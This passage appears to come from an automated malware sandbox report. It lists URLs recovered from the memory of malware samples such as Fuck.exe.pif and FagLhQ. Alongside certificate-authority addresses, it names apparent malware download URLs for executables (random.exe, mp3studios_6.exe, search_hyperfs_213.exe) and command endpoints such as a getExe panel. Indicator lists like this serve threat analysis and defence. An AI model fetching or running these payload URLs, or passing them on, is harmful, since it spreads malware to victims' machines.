                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ngdatas.pw/
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmp, Fuck.exe.pif, 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmp, Fuck.exe.pif, 00000014.00000000.42628391239.0000000000F35000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.channelinfo.pw/index.php/Home/Index/getExe
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeaband
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mkpmc.com
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mkpmc.com/Home/Index/getdata
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz/m/files/pe/pb1105.exe
                Source: Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk/
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk1
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqkLMEM
                Source: Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqkUAZjRRZhjPeC
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqkj
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/2jhbdhjfsdf2.monsterS5
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/J
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/m
                Source: Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exe
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exe.
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exe0
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exeown/u4vYmgIN4sqk0fc498
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios_6.exe
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios_6.exeLMEMX
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios_6.exepData
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios_6.exerniaC:
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.savesucpnys.xyz/mp3studios_6.exey
                Source: Fuck.exe.pif, 0000000D.00000003.42638012582.000000000463D000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42554113725.000000000464C000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42636513571.0000000004637000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42637692087.0000000004638000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42637179703.0000000004553000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42638430507.00000000045E7000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42635913525.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42638778187.000000000464C000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42634267780.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42636887464.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000003.42554698330.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000000.42580312772.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47252606329.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.comopenThe
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/cal
                Source: Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/search_hyperfs_213.exe
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/search_hyperfs_213.exeCn
                Source: Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/search_hyperfs_213.exegn
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/search_hyperfs_213.exemm
                Source: Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2jhbdhjfsdf2.monster/u
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.dowgmea.com/
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.dowgmea.com/ele3seQjY0QMdbuzcmH4UpZjBK6WzKu1lJyjLlRgrPJc4OpWiLo3P91NBec1Y7co7TKo2u3ei
                Source: Fuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.dowgmea.com/gamexyz/3004/random.exe
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.dowgmea.com/gamexyz/3004/random.exeH
                Source: Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.dowgmea.com/gamexyz/3004/random.exelifornia1
                Source: FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43357949322.000000000261C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://adblockfast.com/
                Source: FagLhQ.tmp, 00000016.00000003.43359333338.0000000002694000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://adblockfast.com/#contact
                Source: FagLhQ, 00000015.00000003.43375838077.000000000250C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://adblockfast.com/#contact)
                Source: FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://adblockfast.com/#contact0https://adblockfast.com/
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://adblockfast.com//license
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                Source: FagLhQ, 00000015.00000003.43374481813.000000000249C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42706973626.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.joinmassive.com/telemetry?source=installer&env=prod
                Source: Fuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.dowgmeb.com/
                Source: Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeC
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeJ~?
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 